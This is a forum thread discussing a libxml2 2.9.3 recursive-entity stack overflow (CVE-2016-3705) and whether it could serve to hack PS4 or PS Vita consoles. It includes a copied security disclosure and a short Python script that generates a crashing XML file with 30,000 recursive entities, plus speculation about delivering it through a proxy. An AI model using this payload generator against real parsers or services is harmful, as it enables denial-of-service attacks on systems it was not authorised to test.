Advertising (This ad goes away for registered users. You can Login or Register)

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Underground PS4 discussions
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
Locked
dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by dragood2 »

Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect its a invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't here back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advise otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.
Advertising
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.
dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Re: Libxml2 exploit poc, possible ps4 port?

Post by dragood2 »

Script:
#!/bin/python3

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()
Advertising
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 exploit poc, possible ps4 port?

Post by wololo »

Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!
lazydog2055
Posts: 1
Joined: Wed May 04, 2016 11:40 pm

Re: Libxml2 exploit poc, possible ps4 port?

Post by lazydog2055 »

looks like there was also an xml exploit in ios and osx. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo »

Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!
xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz »

it's useless
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo »

Can you detail why? Stack Protector, but besides that?
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!
xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz »

It's stack exhaustion due to high recursion depth. As you can see https://access.redhat.com/security/cve/cve-2016-3705 https://access.redhat.com/security/cve/cve-2016-3627 both bugs only have availability impact, i.e. it's a DoS.
wololo
Site Admin
Posts: 3621
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo »

Thanks
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!
Zecoxao
Posts: 280
Joined: Mon Sep 27, 2010 7:27 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by Zecoxao »

Image
My sig is original :D
Locked

Return to “Programming and Security”